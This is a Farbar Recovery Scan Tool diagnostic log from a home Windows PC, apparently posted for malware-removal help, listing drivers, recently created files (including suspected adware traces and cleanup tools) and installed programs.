C:\Program Files\ Malwarebytes Anti-Malware \mbamservice.exe [969016 2014-11-21] (Malwarebytes Corporation) R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22192 2014-08-22] (Microsoft Corporation) R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2009-05-14] (Hewlett-Packard) [File not signed] R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [288120 2014-08-22] (Microsoft Corporation) R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2009-05-14] (Hewlett-Packard) [File not signed] ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R1 DritekPortIO; C:\Program Files\Launch Manager\DPortIO.sys [20112 2006-11-02] (Dritek System Inc.) S3 grmnusb; C:\Windows\System32\drivers\grmnusb.sys [15720 2012-04-18] (GARMIN Corp.) S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [35992 2014-12-05] () R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [23256 2014-11-21] (Malwarebytes Corporation) R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [51928 2014-11-21] (Malwarebytes Corporation) R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [231800 2014-07-17] (Microsoft Corporation) S3 USB_RNDIS; C:\Windows\System32\DRIVERS\usb8023.sys [15872 2013-02-12] (Microsoft Corporation) S3 BS2521310881; \??\C:\Users\finja\AppData\Local\Temp\NTFS.sys [X] S3 IntcAzAudAddService; system32\drivers\RTKVHDA.sys [X] S3 IpInIp; system32\DRIVERS\ipinip.sys [X] S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X] S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-12-06 17:35 - 2014-12-06 17:35 - 00000000 ____D () C:\Users\finja\Desktop\FRST-OlderVersion 2014-12-06 16:21 - 2014-12-06 16:21 - 00000634 _____ () C:\Users\finja\Desktop\JRT.txt 2014-12-06 15:41 - 2014-12-06 15:41 - 00001257 _____ () C:\Users\finja\Desktop\AdwCleaner[S3].txt 2014-12-06 15:36 - 2014-12-06 15:36 - 01707646 _____ (Thisisu) C:\Users\finja\Desktop\JRT.exe 2014-12-06 15:35 - 2014-12-06 15:35 - 02153472 _____ () C:\Users\finja\Desktop\AdwCleaner_4.104.exe 2014-12-06 10:28 - 2014-12-06 16:14 - 00001435 _____ () C:\Users\finja\Desktop\mbam.txt 2014-12-06 10:23 - 2014-12-06 10:24 - 00018716 _____ () C:\Users\finja\Desktop\gmer.txt 2014-12-06 09:22 - 2014-12-06 16:32 - 00023867 _____ () C:\Users\finja\Desktop\Addition.txt 2014-12-06 09:22 - 2014-12-06 09:22 - 00380416 _____ () C:\Users\finja\Desktop\v5shw8ku.exe 2014-12-06 09:20 - 2014-12-06 17:45 - 00013197 _____ () C:\Users\finja\Desktop\FRST.txt 2014-12-06 09:20 - 2014-12-06 17:43 - 00000000 ____D () C:\FRST 2014-12-06 09:19 - 2014-12-06 17:35 - 01111040 _____ (Farbar) C:\Users\finja\Desktop\FRST.exe 2014-12-06 09:18 - 2014-12-06 09:18 - 00000472 _____ () C:\Users\finja\Desktop\defogger_disable.log 2014-12-06 09:18 - 2014-12-06 09:18 - 00000000 _____ () C:\Users\finja\defogger_reenable 2014-12-06 09:17 - 2014-12-06 09:17 - 00050477 _____ () C:\Users\finja\Desktop\Defogger.exe 2014-12-06 08:40 - 2014-12-06 08:50 - 00003570 _____ () C:\Users\finja\Desktop\Rkill.txt 2014-12-06 08:39 - 2014-12-06 08:39 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\finja\Downloads\rkill.exe 2014-12-05 21:51 - 2014-12-06 17:42 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-12-05 21:51 - 2014-12-05 21:53 - 00000901 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk 2014-12-05 21:50 - 2014-12-05 21:53 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 2014-12-05 21:50 - 2014-12-05 21:53 - 00000000 ____D () C:\Program Files\ Malwarebytes Anti-Malware 2014-12-05 21:50 - 2014-11-21 06:14 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2014-12-05 21:50 - 2014-11-21 06:14 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2014-12-05 21:50 - 2014-11-21 06:14 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2014-12-05 21:07 - 2014-12-06 15:35 - 00000110 _____ () C:\AdwCleanerDebug.txt 2014-12-05 21:04 - 2014-12-05 21:04 - 00000000 ____D () C:\TDSSKiller_Quarantine 2014-12-05 20:49 - 2014-12-05 20:49 - 00035992 _____ () C:\Windows\system32\Drivers\hitmanpro37.sys 2014-12-05 20:32 - 2014-12-05 20:32 - 00011842 _____ () C:\Windows\system32\.crusader 2014-12-05 20:01 - 2014-12-05 20:32 - 00000000 ____D () C:\Users\finja\AppData\Local\gnuutilityUI 2014-12-05 20:01 - 2014-12-05 20:02 - 00000000 ____D () C:\Windows\system32\guicca32 2014-12-05 19:40 - 2014-12-05 19:40 - 263670483 _____ () C:\Windows\MEMORY.DMP 2014-12-05 19:40 - 2014-12-05 19:40 - 00145784 _____ () C:\Windows\Minidump\Mini120514-01.dmp 2014-12-05 19:39 - 2014-12-05 19:39 - 00000000 ____D () C:\Temp 2014-12-05 13:33 - 2014-12-05 20:08 - 00000000 ____D () C:\ProgramData\HitmanPro 2014-12-04 20:43 - 2014-12-04 20:43 - 00000000 ____D () C:\Users\finja\AppData\Local\Microsoft Corporation 2014-11-29 20:02 - 2014-11-29 20:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WEB.DE MailCheck 2014-11-29 20:02 - 2014-11-29 20:02 - 00000000 ____D () C:\Program Files\WEB.DE MailCheck 2014-11-27 22:42 - 2014-11-27 22:42 - 00000000 ____D () C:\Program Files\Microsoft ATS 2014-11-27 22:33 - 2014-11-27 22:33 - 11473216 _____ (Microsoft Corporation) C:\Users\finja\Downloads\mseinstall (1).exe 2014-11-27 22:31 - 2014-11-27 22:31 - 11473216 _____ (Microsoft Corporation) C:\Users\finja\Downloads\mseinstall.exe 2014-11-27 22:23 - 2014-11-27 22:23 - 00001998 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows 7 Upgrade Advisor.lnk 2014-11-27 22:23 - 2014-11-27 22:23 - 00001986 _____ () C:\Users\Public\Desktop\Windows 7 Upgrade Advisor.lnk 2014-11-27 22:23 - 2014-11-27 22:23 - 00000000 ____D () C:\Program Files\Microsoft Windows 7 Upgrade Advisor 2014-11-27 21:25 - 2014-11-27 21:25 - 00000000 ____D () C:\Windows\system32\DesktopMBRText 2014-11-25 15:33 - 2014-12-05 20:32 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage 2014-11-19 21:31 - 2014-10-24 02:03 - 00499200 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll 2014-11-13 14:27 - 2014-11-13 14:27 - 00000951 _____ () C:\Users\finja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2014-11-13 13:30 - 2014-11-13 13:30 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-11-13 13:25 - 2014-11-13 13:25 - 00000000 ____D () C:\Windows\ERUNT 2014-11-13 13:15 - 2014-12-06 15:37 - 00000000 ____D () C:\AdwCleaner 2014-11-13 12:54 - 2014-12-05 13:56 - 00001356 _____ () C:\Users\finja\AppData\Local\d3d9caps.dat 2014-11-12 23:01 - 2014-10-10 02:01 - 00449536 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll 2014-11-12 23:01 - 2014-10-10 02:00 - 01259008 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll 2014-11-12 23:01 - 2014-10-10 02:00 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll 2014-11-12 23:01 - 2014-10-10 00:22 - 00619520 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll 2014-11-12 22:59 - 2014-09-19 01:50 - 00278528 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll 2014-11-12 22:59 - 2014-08-27 01:55 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll 2014-11-12 22:59 - 2014-08-27 01:55 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll 2014-11-12 22:56 - 2014-08-12 03:25 - 00729600 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10K.DLL 2014-11-12 22:53 - 2014-10-18 02:08 - 00564224 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll 2014-11-12 22:53 - 2014-10-03 02:18 - 00274432 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll 2014-11-12 22:53 - 2014-10-03 02:17 - 00396800 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll 2014-11-12 22:53 - 2014-10-03 02:17 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll 2014-11-12 22:53 - 2014-10-03 02:17 - 00170496 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll 2014-11-12 07:47 - 2014-10-24 02:04 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll 2014-11-12 07:45 - 2014-10-13 00:34 - 02054656 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2014-11-11 22:20 - 2014-10-27 20:10 - 12366848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2014-11-11 22:20 - 2014-10-27 20:05 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2014-11-11 22:20 - 2014-10-27 20:02 - 09739776 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2014-11-11 22:20 - 2014-10-27 19:59 - 01139712 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2014-11-11 22:20 - 2014-10-27 19:59 - 01129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2014-11-11 22:20 - 2014-10-27 19:58 - 01427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2014-11-11 22:20 - 2014-10-27 19:57 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll 2014-11-11 22:20 - 2014-10-27 19:57 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2014-11-11 22:20 - 2014-10-27 19:56 - 01802752 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2014-11-11 22:20 - 2014-10-27 19:56 - 00717824 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll 2014-11-11 22:20 - 2014-10-27 19:56 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2014-11-11 22:20 - 2014-10-27 19:56 - 00421376 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2014-11-11 22:20 - 2014-10-27 19:56 - 00142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe 2014-11-11 22:20 - 2014-10-27 19:55 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb 2014-11-11 22:20 - 2014-10-27 19:55 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2014-11-11 22:20 - 2014-10-27 19:55 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2014-11-11 22:20 - 2014-10-27 19:55 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2014-11-11 22:20 - 2014-10-27 19:55 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll 2014-11-11 22:20 - 2014-10-27 19:55 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe 2014-11-11 22:20 - 2014-10-27 19:55 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe 2014-11-11 22:20 - 2014-10-27 19:54 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll 2014-11-11 08:42 - 2014-11-11 08:42 - 00000000 ____D () C:\Users\finja\AppData\Roaming\AdvancedSystemProtector 2014-11-11 08:33 - 2014-11-11 08:36 - 01057112 _____ (Installer Setup ) C:\Users\finja\Downloads\installer_java_German.exe 2014-11-10 21:27 - 2014-12-05 19:40 - 00000000 ____D () C:\Windows\Minidump 2014-11-08 21:59 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\7bb6df21-8ca8-4eec-965d-8cd2261544c7 2014-11-06 21:02 - 2014-11-06 21:02 - 00000000 ____D () C:\Users\finja\AppData\Local\Macromedia 2014-11-06 20:47 - 2014-11-13 12:44 - 00000000 ____D () C:\ProgramData\boost_interprocess 2014-11-06 20:30 - 2014-11-06 20:30 - 00000003 _____ () C:\Users\finja\Downloads\C ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-12-06 17:42 - 2014-10-05 12:36 - 00000008 __RSH () C:\ProgramData\ntuser.pol 2014-12-06 17:41 - 2009-02-27 10:20 - 00000000 _____ () C:\Windows\system32\LogConfigTemp.xml 2014-12-06 17:40 - 2014-06-08 13:02 - 00140754 _____ () C:\Windows\PFRO.log 2014-12-06 17:40 - 2006-11-02 14:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2014-12-06 17:40 - 2006-11-02 13:47 - 00003216 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0 2014-12-06 17:40 - 2006-11-02 13:47 - 00003216 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0 2014-12-06 17:39 - 2009-02-27 09:31 - 01209597 _____ () C:\Windows\WindowsUpdate.log 2014-12-06 17:39 - 2006-11-02 14:01 - 00032560 _____ () C:\Windows\Tasks\SCHEDLGU.TXT 2014-12-06 17:36 - 2009-05-16 15:26 - 00000000 ____D () C:\Users\finja 2014-12-06 17:35 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\system32\GroupPolicy 2014-12-06 16:09 - 2013-11-26 19:43 - 00000000 ____D () C:\Windows\TempDF28D6CC-3D1E-B803-1F4F-B4B1FD7BEC31-Signatures 2014-12-06 15:38 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\PLA 2014-12-05 22:17 - 2014-10-28 11:28 - 00000000 ____D () C:\ProgramData\83b32e09-56dd-4d15-bbc7-350e8627ec65 2014-12-05 21:41 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\system32\LogFiles 2014-12-05 20:49 - 2014-11-02 19:50 - 00000000 ____D () C:\Windows\system32\JREMetafilePublic 2014-12-05 13:34 - 2008-01-21 08:16 - 01598580 _____ () C:\Windows\system32\PerfStringBackup.INI 2014-11-28 20:51 - 2011-04-11 19:26 - 00000000 ____D () C:\Program Files\1und1Softwareaktualisierung 2014-11-26 18:48 - 2009-05-16 15:28 - 00000000 ____D () C:\Users\finja\AppData\Roaming\Macromedia 2014-11-26 18:28 - 2008-08-15 00:15 - 00000000 ____D () C:\ProgramData\Adobe 2014-11-13 14:30 - 2014-11-04 07:52 - 00000000 ____D () C:\Program Files\Mozilla Firefox 2014-11-13 14:29 - 2008-08-15 00:11 - 00000000 ____D () C:\Program Files\Google 2014-11-13 14:27 - 2009-05-16 15:28 - 00000000 ____D () C:\Users\finja\AppData\Local\Google 2014-11-13 14:25 - 2014-11-04 07:59 - 00000000 ____D () C:\Program Files\F978377C-B7D4-4536-8E10-14CA97B13394 2014-11-13 13:55 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\rescache 2014-11-13 13:46 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\Microsoft.NET 2014-11-13 13:18 - 2011-04-11 19:27 - 00000885 _____ () C:\Users\finja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WEB.DE.lnk 2014-11-12 23:04 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\system32\de-DE 2014-11-12 23:01 - 2008-08-15 00:16 - 00000000 ____D () C:\ProgramData\Microsoft Help 2014-11-12 22:52 - 2013-08-02 19:19 - 00000000 ____D () C:\Windows\system32\MRT 2014-11-12 22:47 - 2014-06-04 20:19 - 00000106 _____ () C:\Users\finja\AppData\Roaming\WB.CFG 2014-11-12 22:39 - 2006-11-02 11:24 - 100445232 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe 2014-11-12 22:27 - 2006-11-02 11:23 - 00000321 _____ () C:\Windows\win.ini 2014-11-12 14:45 - 2006-11-02 13:47 - 00393944 _____ () C:\Windows\system32\FNTCACHE.DAT 2014-11-08 21:15 - 2014-11-02 19:57 - 00000000 ___HD () C:\Users\Public\Temp 2014-11-06 20:56 - 2014-11-02 19:50 - 00000000 ____D () C:\Program Files\Free Flash Plugin 2014-11-06 20:49 - 2012-08-10 17:12 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe 2014-11-06 20:49 - 2011-12-26 19:46 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl 2014-11-06 20:49 - 2009-05-16 16:07 - 00000000 ____D () C:\Users\finja\AppData\Local\Adobe ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\explorer.exe => File is digitally signed C:\Windows\system32\winlogon.exe => File is digitally signed C:\Windows\system32\wininit.exe => File is digitally signed C:\Windows\system32\svchost.exe => File is digitally signed C:\Windows\system32\services.exe => File is digitally signed C:\Windows\system32\User32.dll => File is digitally signed C:\Windows\system32\userinit.exe => File is digitally signed C:\Windows\system32\rpcss.dll => File is digitally signed C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-12-06 16:22 ==================== End Of Log ============================ --- --- --- Addition: Code:
ATTFilter Additional scan result of Farbar Recovery Scan Tool (x86) Version: 06-12-2014 02
Ran by finja at 2014-12-06 17:45:42
Running from C:\Users\finja\Desktop
Boot Mode: Normal
==========================================================
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
32 Bit HP CIO Components Installer (Version: 6.1.2 - Hewlett-Packard) Hidden
Activation Assistant for the 2007 Microsoft Office suites (HKLM\...\Activation Assistant for the 2007 Microsoft Office suites) (Version: - Microsoft Corporation)
Activation Assistant for the 2007 Microsoft Office suites (Version: 1.0 - Microsoft Corporation) Hidden
Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.3.0.3650 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) - Deutsch (HKLM\...\{AC76BA86-7AD7-1031-7B44-AA1000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: Version 7.0.1101.18 - Alps Electric)
Bookworm Deluxe (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110113233}) (Version: - Oberon Media)
Bricks of Egypt (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11029123}) (Version: - Oberon Media)
Build-a-lot (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113537610}) (Version: - Oberon Media)
Cake Mania (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111199750}) (Version: - Oberon Media)
Chuzzle (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110411970}) (Version: - Oberon Media)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Diner Dash (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110305887}) (Version: - Oberon Media)
DJ_AIO_06_F4500_SW_MIN (Version: 140.0.690.000 - Hewlett-Packard) Hidden
Dream Day First Home (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113832110}) (Version: - Oberon Media)
eDeals version 1.0 (HKLM\...\eDeals_is1) (Version: 1.0 - eDeals)
eMachines (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11019760}) (Version: - Oberon Media)
eMachines Recovery Management (HKLM\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 3.1.3003 - Acer Incorporated)
eMachines ScreenSaver (HKLM\...\{79DD56FC-DB8B-47F5-9C80-78B62E05F9BC}) (Version: 1.02.0902 - Acer Incorporated)
Galapago (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111307457}) (Version: - Oberon Media)
Garmin BaseCamp (HKLM\...\{7C69F731-6471-48FE-899B-1C40F80042C7}) (Version: 4.4.2 - Garmin Ltd or its subsidiaries)
Garmin City Navigator Europe NT 2012.20 Update (HKLM\...\{6D3A83A6-8F72-4354-A80D-721D1E54FC76}) (Version: 15.20.0.0 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM\...\{ABA5E381-EC46-425C-86C5-5CD15BBFB4BF}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
GearDrvs (Version: 1.00.0000 - GEAR Software) Hidden
HP Deskjet F4500 All-in-One Driver 14.0 Rel. 6 (HKLM\...\{0AFFEA39-60AF-4C4F-BB47-4A1F7CB12129}) (Version: 14.0 - HP)
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: - Intel Corporation)
InterVideo WinDVD 8 (HKLM\...\InstallShield_{20471B27-D702-4FE8-8DEC-0702CC8C0A85}) (Version: 8.0-B9.498 - InterVideo Inc.)
InterVideo WinDVD 8 (Version: 8.0-B9.498 - InterVideo Inc.) Hidden
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Konz 2013 (HKLM\...\InstallShield_{76651FD7-2B71-4B61-9F3A-E82F52F08D92}) (Version: 1.00.0000 - USM)
Konz 2013 (Version: 1.00.0000 - USM) Hidden
Launch Manager (HKLM\...\LManager) (Version: - )
LightScribe 1.4.142.1 (Version: 1.4.142.1 - hxxp://www.lightscribe.com) Hidden
Luxor (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111265347}) (Version: - Oberon Media)
Mahjong Escape Ancient China (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111252743}) (Version: - Oberon Media)
Malwarebytes Anti-Malware Version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Mesh Runtime (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 Language Pack SP1 - DEU (HKLM\...\Microsoft .NET Framework 3.5 Language Pack SP1 - deu) (Version: - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Automated Troubleshooting Services Shim (HKLM\...\{c9920352-04e6-469d-bab8-e2b9c7c75415}.sdb) (Version: - )
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Live Add-in 1.5 (HKLM\...\{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}) (Version: 2.0.4024.1 - Microsoft Corporation)
Microsoft Office Outlook Connector (HKLM\...\{95140000-007A-0407-0000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Works (HKLM\...\{4EA2F95F-A537-4d17-9E7F-6B3FF8D9BBE3}) (Version: 08.05.0822 - Microsoft Corporation)
MSVCRT (Version: 15.4.2862.0708 - Microsoft) Hidden
myphotobook.de (HKLM\...\de.myphotobook.creator.001F9DF2D0BAABEB11F42CCEE43224607B61109C.1) (Version: 1.4.3 - myphotobook GmbH)
myphotobook.de (Version: 1.4.3 - myphotobook GmbH) Hidden
Network (Version: 140.0.215.000 - Hewlett-Packard) Hidden
NTI Media Maker 8 (HKLM\...\InstallShield_{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.12.6325 - NewTech Infosystems)
NTI Media Maker 8 (Version: 8.0.12.6325 - NewTech Infosystems) Hidden
Ravensburger tiptoi (HKLM\...\Ravensburger tiptoi) (Version: - )
Scan (Version: 140.0.80.000 - Hewlett-Packard) Hidden
Segoe UI (Version: 15.4.2271.0615 - Microsoft Corp) Hidden
Steuer 2012 (HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\{01159E8A-44F7-4885-A7F9-872CE4D74063}) (Version: 20.00.8137 - Buhl Data Service GmbH)
Toolbox (Version: 140.0.428.000 - Hewlett-Packard) Hidden
Turbo Pizza (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113009953}) (Version: - Oberon Media)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Update für Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0407-0000-0000000FF1CE}_ENTERPRISE_{BEC163EC-7A83-48A1-BFB6-3BF47CC2F8CF}) (Version: - Microsoft)
Update für Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0407-0000-0000000FF1CE}_HOMESTUDENTR_{BEC163EC-7A83-48A1-BFB6-3BF47CC2F8CF}) (Version: - Microsoft)
Update für Microsoft Office Outlook 2007 Help (KB963677) (HKLM\...\{90120000-001A-0407-0000-0000000FF1CE}_ENTERPRISE_{F6828576-6F79-470D-AB50-69D1BBADBD30}) (Version: - Microsoft)
Update für Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0407-0000-0000000FF1CE}_ENTERPRISE_{EA160DA3-E9B5-4D03-A518-21D306665B96}) (Version: - Microsoft)
